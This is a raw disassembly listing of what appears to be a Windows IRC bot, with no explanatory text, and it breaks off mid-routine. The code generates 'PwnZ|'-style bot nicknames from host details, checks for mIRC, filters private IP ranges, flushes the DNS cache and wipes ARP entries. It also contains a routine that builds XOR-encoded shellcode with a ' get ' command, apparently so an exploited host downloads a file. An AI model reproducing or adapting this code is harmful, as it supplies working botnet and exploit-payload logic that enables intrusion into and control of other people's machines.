push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40ACE4: ; CODE XREF: sub_40AAC8+1EE�j
cmp dword_4E4330, esi
jz short loc_40AD18
push dword_4E4334
lea eax, [ebp+Dest]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AD18: ; CODE XREF: sub_40AAC8+222�j
cmp dword_4E4338, esi
jz short loc_40AD4C
push dword_4E433C
lea eax, [ebp+Dest]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AD4C: ; CODE XREF: sub_40AAC8+256�j
cmp dword_4E4340, esi
jz short loc_40AD80
push dword_4E4344
lea eax, [ebp+Dest]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AD80: ; CODE XREF: sub_40AAC8+28A�j
cmp dword_4E4348, esi
jz short loc_40ADB4
push dword_4E434C
lea eax, [ebp+Dest]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40ADB4: ; CODE XREF: sub_40AAC8+2BE�j
lea eax, [ebp+Dest]
push offset asc_445258 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40ADE1
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_40ADE1: ; CODE XREF: sub_40AAC8+302�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40AAC8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20h
cmp dword ptr [ebp+8], 0
push esi
jz loc_40AE88
push offset dword_4E4364
push dword ptr [ebp+8]
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40AE88
push 20h
lea eax, [ebp-20h]
push dword ptr [ebp+8]
push eax
call _strncpy
lea eax, [ebp-20h]
push offset a__9 ; "."
push eax
call _strtok
add esp, 14h
test eax, eax
jz short loc_40AE88
push eax
call _atoi
mov dword ptr [esp], offset a__10 ; "."
push 0
mov esi, eax
call _strtok
pop ecx
test eax, eax
pop ecx
jz short loc_40AE88
push eax
call _atoi
cmp esi, 0Ah
pop ecx
jz short loc_40AE83
cmp esi, 0ACh
jnz short loc_40AE74
cmp eax, 0Fh
jle short loc_40AE88
cmp eax, 20h
jl short loc_40AE83
loc_40AE74: ; CODE XREF: .text:0040AE68�j
cmp esi, 0C0h
jnz short loc_40AE88
cmp eax, 0A8h
jnz short loc_40AE88
loc_40AE83: ; CODE XREF: .text:0040AE60�j
; .text:0040AE72�j
push 1
pop eax
jmp short loc_40AE8A
; ---------------------------------------------------------------------------
loc_40AE88: ; CODE XREF: .text:0040ADFE�j
; .text:0040AE15�j ...
xor eax, eax
loc_40AE8A: ; CODE XREF: .text:0040AE86�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40AE8D proc near ; CODE XREF: sub_4019E7+4F�p
; sub_401CC7+5DF5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40AEB5
push [esp+arg_0]
call dword_4E42A4 ; gethostbyname
test eax, eax
jnz short loc_40AEAE
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40AEAE: ; CODE XREF: sub_40AE8D+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40AEB5: ; CODE XREF: sub_40AE8D+D�j
retn
sub_40AE8D endp
; =============== S U B R O U T I N E =======================================
sub_40AEB6 proc near ; CODE XREF: sub_4019E7+D6�p
mov ecx, dword_4E413C
xor eax, eax
test ecx, ecx
jz short locret_40AEC4
call ecx ; DnsFlushResolverCache
locret_40AEC4: ; CODE XREF: sub_40AEB6+A�j
retn
sub_40AEB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AEC5 proc near ; CODE XREF: sub_401CC7:loc_404117�p
Dest = byte ptr -88h
Size = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+Size]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+Size], edi
mov [ebp+var_4], ebx
call dword_4E429C ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AF91
sub ecx, 32h
jz loc_40AF8A
sub ecx, 48h
jz short loc_40AF25
sub ecx, 6Eh
jz short loc_40AF1E
push eax
push offset asc_445330 ; "-"
loc_40AF0D: ; CODE XREF: sub_40AEC5+91�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF1E: ; CODE XREF: sub_40AEC5+40�j
push offset unk_4452DC
jmp short loc_40AF5D
; ---------------------------------------------------------------------------
loc_40AF25: ; CODE XREF: sub_40AEC5+3B�j
push [ebp+Size] ; Size
call _malloc
push [ebp+Size] ; Size
mov esi, eax
push edi ; Val
push esi ; Dst
call _memset
add esp, 10h
cmp esi, edi
jz short loc_40AF58
lea eax, [ebp+Size]
push ebx
push eax
push esi
call dword_4E429C ; GetIpNetTable
cmp eax, edi
jz short loc_40AF91
push eax
push offset unk_445280
jmp short loc_40AF0D
; ---------------------------------------------------------------------------
loc_40AF58: ; CODE XREF: sub_40AEC5+79�j
push offset asc_4452AC ; "-"
loc_40AF5D: ; CODE XREF: sub_40AEC5+5E�j
; sub_40AEC5+CA�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40AF6B: ; CODE XREF: sub_40AEC5+57�j
lea eax, [ebp+Dest]
mov [ebp+var_4], edi
push eax
call sub_415C77
pop ecx
loc_40AF7B: ; CODE XREF: sub_40AEC5+CE�j
; sub_40AEC5+E2�j
push esi ; Memory
call _free
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AF8A: ; CODE XREF: sub_40AEC5+32�j
push offset unk_445300
jmp short loc_40AF5D
; ---------------------------------------------------------------------------
loc_40AF91: ; CODE XREF: sub_40AEC5+29�j
; sub_40AEC5+89�j
cmp [esi], edi
jbe short loc_40AF7B
lea ebx, [esi+4]
loc_40AF98: ; CODE XREF: sub_40AEC5+E0�j
push ebx
call dword_4E4298 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AF98
jmp short loc_40AF7B
sub_40AEC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AFA9 proc near ; CODE XREF: sub_401CC7+2207�p
; sub_401CC7+2358�p ...
Dst = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4E41C4 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset byte_4E4350
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi ; Dest
call _sprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AFA9 endp
; =============== S U B R O U T I N E =======================================
sub_40B002 proc near ; CODE XREF: .text:0040C869�p
; sub_4135C1+24C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40B02B
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40B01E: ; CODE XREF: sub_40B002+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40B01E
pop edi
jmp short loc_40B02F
; ---------------------------------------------------------------------------
loc_40B02B: ; CODE XREF: sub_40B002+A�j
mov edx, [esp+4+arg_0]
loc_40B02F: ; CODE XREF: sub_40B002+27�j
test esi, esi
pop esi
jz short loc_40B039
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40B039: ; CODE XREF: sub_40B002+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40B002 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+0Ch]
mov edx, [ebp+8]
push esi
xor esi, esi
cmp eax, 1
mov [ebp-4], esi
jle short loc_40B07C
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_40B06E: ; CODE XREF: .text:0040B076�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_40B06E
pop edi
cmp eax, 1
loc_40B07C: ; CODE XREF: .text:0040B062�j
jnz short loc_40B089
mov al, [edx]
mov [ebp-4], al
movzx eax, word ptr [ebp-4]
add esi, eax
loc_40B089: ; CODE XREF: .text:loc_40B07C�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
leave
retn
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B0A2(char *Dest)
sub_40B0A2 proc near ; CODE XREF: sub_40B487+49�p
; DATA XREF: .data:off_445378�o
Dest = dword ptr 4
push esi
push edi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+8+Dest]
push off_4453E0[edx*4]
push offset aS_38 ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_440094, esi
jle short loc_40B10A
loc_40B0E4: ; CODE XREF: sub_40B0A2+66�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_3 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_440094
jl short loc_40B0E4
loc_40B10A: ; CODE XREF: sub_40B0A2+40�j
mov eax, edi
pop edi
pop esi
retn
sub_40B0A2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B10F(char *Dest)
sub_40B10F proc near ; DATA XREF: .data:0044538C�o
var_C = dword ptr -0Ch
Dest = dword ptr 4
push esi
push edi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
mov edi, [esp+0Ch+Dest]
mov [esp+0Ch+var_C], offset aPwnz ; "PwnZ|"
push offset aS_39 ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_440094, esi
jle short loc_40B168
loc_40B142: ; CODE XREF: sub_40B10F+57�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_4 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_440094
jl short loc_40B142
loc_40B168: ; CODE XREF: sub_40B10F+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40B10F endp
; =============== S U B R O U T I N E =======================================
sub_40B16D proc near ; CODE XREF: sub_401CC7+6B1E�p
; DATA XREF: .data:004453A0�o
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_440094
test esi, esi
jle short loc_40B1B0
loc_40B19A: ; CODE XREF: sub_40B16D+41�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40B19A
loc_40B1B0: ; CODE XREF: sub_40B16D+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B16D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B1BA(char *Dest)
sub_40B1BA proc near ; DATA XREF: .data:004453B4�o
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, offset aPc ; "PC"
mov [ebp+var_4], 100h
xor edi, edi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4F63C8 ; GetComputerNameA
test eax, eax
jnz short loc_40B1EF
mov esi, offset aPc_0 ; "PC"
loc_40B1EF: ; CODE XREF: sub_40B1BA+2E�j
movsx eax, byte ptr [esi]
push 41h
pop ecx
loc_40B1F5: ; CODE XREF: sub_40B1BA+46�j
cmp eax, ecx
jnz short loc_40B1FC
push 1
pop edi
loc_40B1FC: ; CODE XREF: sub_40B1BA+3D�j
inc ecx
cmp ecx, 5Bh
jl short loc_40B1F5
push 61h
pop ecx
loc_40B205: ; CODE XREF: sub_40B1BA+56�j
cmp eax, ecx
jnz short loc_40B20C
push 1
pop edi
loc_40B20C: ; CODE XREF: sub_40B1BA+4D�j
inc ecx
cmp ecx, 7Bh
jl short loc_40B205
test edi, edi
jnz short loc_40B21B
mov esi, offset aPc_1 ; "PC"
loc_40B21B: ; CODE XREF: sub_40B1BA+5A�j
mov edi, [ebp+Dest]
push esi ; Format
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 0Ch
cmp dword_440094, esi
jle short loc_40B25A
loc_40B234: ; CODE XREF: sub_40B1BA+9E�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_0 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_440094
jl short loc_40B234
loc_40B25A: ; CODE XREF: sub_40B1BA+78�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40B1BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B260(char *Dest)
sub_40B260 proc near ; DATA XREF: .data:004453C8�o
var_C = byte ptr -0Ch
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
lea eax, [ebp+var_C]
push 0Ah
push eax
push 7
push 800h
call ds:dword_4F63CC ; GetLocaleInfoA
mov edi, [ebp+Dest]
lea eax, [ebp+var_C]
push eax
push offset aS_22 ; "%s|"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_440094, esi
jle short loc_40B2CF
loc_40B2A9: ; CODE XREF: sub_40B260+6D�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_1 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_440094
jl short loc_40B2A9
loc_40B2CF: ; CODE XREF: sub_40B260+47�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40B260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B2D5(char *Dest)
sub_40B2D5 proc near ; DATA XREF: .data:004453DC�o
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp+var_94]
push edi
push eax
mov esi, offset dword_4E436C
mov [ebp+var_94], 94h
call ds:dword_4F63D0 ; GetVersionExA
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
cmp [ebp+var_90], 4
pop ecx
jnz short loc_40B359
cmp [ebp+var_8C], 0
jnz short loc_40B339
cmp [ebp+var_84], 1
jnz short loc_40B329
mov esi, offset a95 ; "95"
loc_40B329: ; CODE XREF: sub_40B2D5+4D�j
cmp [ebp+var_84], 2
jnz short loc_40B395
mov esi, offset aNt ; "NT"
jmp short loc_40B395
; ---------------------------------------------------------------------------
loc_40B339: ; CODE XREF: sub_40B2D5+44�j
cmp [ebp+var_8C], 0Ah
jnz short loc_40B349
mov esi, offset a98 ; "98"
jmp short loc_40B395
; ---------------------------------------------------------------------------
loc_40B349: ; CODE XREF: sub_40B2D5+6B�j
cmp [ebp+var_8C], 5Ah
jnz short loc_40B390
mov esi, offset aMe_0 ; "ME"
jmp short loc_40B395
; ---------------------------------------------------------------------------
loc_40B359: ; CODE XREF: sub_40B2D5+3B�j
cmp [ebp+var_90], 5
jnz short loc_40B390
cmp [ebp+var_8C], 0
jnz short loc_40B372
mov esi, offset a2k ; "2K"
jmp short loc_40B395
; ---------------------------------------------------------------------------
loc_40B372: ; CODE XREF: sub_40B2D5+94�j
cmp [ebp+var_8C], 1
jnz short loc_40B382
mov esi, offset aXp ; "XP"
jmp short loc_40B395
; ---------------------------------------------------------------------------
loc_40B382: ; CODE XREF: sub_40B2D5+A4�j
cmp [ebp+var_8C], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40B395
loc_40B390: ; CODE XREF: sub_40B2D5+7B�j
; sub_40B2D5+8B�j
mov esi, offset a??? ; "???"
loc_40B395: ; CODE XREF: sub_40B2D5+5B�j
; sub_40B2D5+62�j ...
mov edi, [ebp+Dest]
push esi
push offset aS_23 ; "[%s]|"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_440094, esi
jle short loc_40B3D9
loc_40B3B3: ; CODE XREF: sub_40B2D5+102�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_2 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_440094
jl short loc_40B3B3
loc_40B3D9: ; CODE XREF: sub_40B2D5+DC�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40B2D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B3DF(char *Dest)
sub_40B3DF proc near ; CODE XREF: sub_40B487+5C�p
Source = byte ptr -1Ch
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_4F63B0 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
mov esi, eax
cmp esi, 64h
jbe short loc_40B42E
push offset aMirc_0 ; "mIRC"
call dword_4E422C ; FindWindowA
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40B417
mov eax, offset dword_4E4370
loc_40B417: ; CODE XREF: sub_40B3DF+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+Source]
push 1Ch ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_40B453
; ---------------------------------------------------------------------------
loc_40B42E: ; CODE XREF: sub_40B3DF+1D�j
push offset aMirc_1 ; "mIRC"
call dword_4E422C ; FindWindowA
test eax, eax
mov eax, offset aM_1 ; "[M]"
jnz short loc_40B447
mov eax, offset dword_4E4374
loc_40B447: ; CODE XREF: sub_40B3DF+61�j
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40B453: ; CODE XREF: sub_40B3DF+4D�j
lea eax, [ebp+Source]
push eax ; Str
call _strlen
pop ecx
cmp eax, 2
pop esi
jbe short loc_40B482
push 1Ch ; Count
lea eax, [ebp+Source]
push [ebp+Dest] ; Source
push eax ; Dest
call _strncat
lea eax, [ebp+Source]
push 1Ch ; Count
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
add esp, 18h
loc_40B482: ; CODE XREF: sub_40B3DF+82�j
mov eax, [ebp+Dest]
leave
retn
sub_40B3DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B487(char *Dest,int,int,char *Str1)
sub_40B487 proc near ; CODE XREF: sub_4019E7+7F�p
; sub_401B4F+50�p ...
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str1 = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_445374
loc_40B493: ; CODE XREF: sub_40B487+3F�j
cmp [ebp+Str1], 0
jz short loc_40B4AE
lea eax, [esi-0Ch]
push eax ; Str2
push [ebp+Str1] ; Str1
call _strcmp
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B4B8
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40B487+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40B4B8: ; CODE XREF: sub_40B487+25�j
test eax, eax
jnz short loc_40B4CA
add esi, 14h
inc edi
cmp esi, offset off_4453EC
jb short loc_40B493
jmp short loc_40B4D8
; ---------------------------------------------------------------------------
loc_40B4CA: ; CODE XREF: sub_40B487+33�j
push [ebp+Dest] ; Dest
lea eax, [edi+edi*4]
call off_445378[eax*4]
pop ecx
loc_40B4D8: ; CODE XREF: sub_40B487+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40B4EB
push [ebp+Dest] ; Dest
call sub_40B3DF
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B4EB: ; CODE XREF: sub_40B487+57�j
mov eax, [ebp+Dest]
pop ebp
retn
sub_40B487 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B4F0(char *Str,int)
sub_40B4F0 proc near ; CODE XREF: sub_40B510+A�p
; sub_40B5E8+8�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+Str] ; Str
call _strlen
push [esp+8+arg_4] ; Str
mov esi, eax
call _strlen
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_40B4F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B510(void *Dst,int,char *Src,int)
sub_40B510 proc near ; CODE XREF: .text:0040B648�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C] ; int
push [ebp+Src] ; Str
call sub_40B4F0
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40B52D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B52D: ; CODE XREF: sub_40B510+17�j
push ebx
push esi
push edi
push [ebp+Src] ; Str
call _strlen
push [ebp+arg_C] ; Str
mov esi, eax
call _strlen
mov edi, eax
mov ebx, [ebp+Dst]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_449164, eax
lea eax, [edi+1]
mov dword_449185, eax
lea eax, [edi+17h]
mov dword_44917D, eax
pop eax
push 74h ; Size
sub eax, edi
push offset dword_449100 ; Src
push ebx ; Dst
mov dword_449193, eax
call _memcpy
push esi ; Size
lea eax, [ebx+74h]
push [ebp+Src] ; Src
push eax ; Dst
call _memcpy
add esi, 74h
push 5 ; Size
push offset aGet ; " get "
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, 5
push edi ; Size
push [ebp+arg_C] ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, edi
push 10h ; Size
push (offset aGet+5) ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esp, 44h
add esi, 10h
push edi ; Size
lea eax, [esi+ebx]
push [ebp+arg_C] ; Src
push eax ; Dst
call _memcpy
add esi, edi
push 38h ; Size
add esi, ebx
push offset byte_449189 ; Src
push esi ; Dst
call _memcpy
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40B510 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B5E8(char *Str,int)
sub_40B5E8 proc near ; CODE XREF: .text:0040B60C�p
Str = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4] ; int
push [esp+4+Str] ; Str
call sub_40B4F0
push eax
call sub_40B66C
add esp, 0Ch
retn
sub_40B5E8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+10h]
push edi
mov edi, [ebp+14h]
push edi
push ebx
call sub_40B5E8
cmp eax, [ebp+0Ch]
pop ecx
pop ecx
ja short loc_40B61F
cmp eax, 0FFFFh
jbe short loc_40B623
loc_40B61F: ; CODE XREF: .text:0040B616�j
xor eax, eax
jmp short loc_40B668
; ---------------------------------------------------------------------------
loc_40B623: ; CODE XREF: .text:0040B61D�j
push esi
push edi
push ebx
call sub_40B4F0
add eax, 101h
push eax
call _malloc
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_40B4F0
pop ecx
pop ecx
push eax
push esi
call sub_40B510
push eax
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40B687
push esi
mov edi, eax
call _free
add esp, 24h
mov eax, edi
pop esi
loc_40B668: ; CODE XREF: .text:0040B621�j
pop edi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_40B66C proc near ; CODE XREF: sub_40B5E8+E�p
; sub_40B687+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40B675
inc ecx
loc_40B675: ; CODE XREF: sub_40B66C+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40B66C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B687(void *Dst,int,int,int)
sub_40B687 proc near ; CODE XREF: .text:0040B655�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_40B6A3
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_40B6A3
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_40B6A3
cmp byte ptr [ebp+arg_C], 0
jnz short loc_40B6A6
loc_40B6A3: ; CODE XREF: sub_40B687+8�j
; sub_40B687+E�j ...
inc [ebp+arg_C]
loc_40B6A6: ; CODE XREF: sub_40B687+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_40B6CE
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_40B6C7
cmp al, 0Dh
jz short loc_40B6C7
cmp al, 5Ch
jz short loc_40B6C7
test al, al
jnz short loc_40B6CE
loc_40B6C7: ; CODE XREF: sub_40B687+32�j
; sub_40B687+36�j ...
add [ebp+arg_C], 100h
loc_40B6CE: ; CODE XREF: sub_40B687+28�j
; sub_40B687+3E�j
push [ebp+arg_C]
call sub_40B66C
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40B6E6
cmp eax, 0FFFFh
jbe short loc_40B6ED
loc_40B6E6: ; CODE XREF: sub_40B687+56�j
xor eax, eax
jmp loc_40B78B
; ---------------------------------------------------------------------------
loc_40B6ED: ; CODE XREF: sub_40B687+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_4E4378
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_40B71D
loc_40B701: ; CODE XREF: sub_40B687+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_40B714
cmp al, 0Ah
jz short loc_40B714
cmp al, 0Dh
jz short loc_40B714
cmp al, 5Ch
jnz short loc_40B718
loc_40B714: ; CODE XREF: sub_40B687+7F�j
; sub_40B687+83�j ...
inc bl
xor edx, edx
loc_40B718: ; CODE XREF: sub_40B687+8B�j
inc edx
cmp edx, ecx
jb short loc_40B701
loc_40B71D: ; CODE XREF: sub_40B687+78�j
cmp ecx, esi
mov byte_4E4378, bl
ja short loc_40B749
push 15h ; Size
push offset dword_4490E8 ; Src
push [ebp+Dst] ; Dst
mov byte_4490F5, cl
mov byte_4490F9, bl
call _memcpy
add esp, 0Ch
push 15h
jmp short loc_40B76A
; ---------------------------------------------------------------------------
loc_40B749: ; CODE XREF: sub_40B687+9E�j
push 17h ; Size
push offset dword_4490D0 ; Src
push [ebp+Dst] ; Dst
mov word_4490DE, cx
mov byte_4490E3, bl
call _memcpy
add esp, 0Ch
push 17h
loc_40B76A: ; CODE XREF: sub_40B687+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_40B786
mov edx, [ebp+Dst]
lea esi, [ecx+edx]
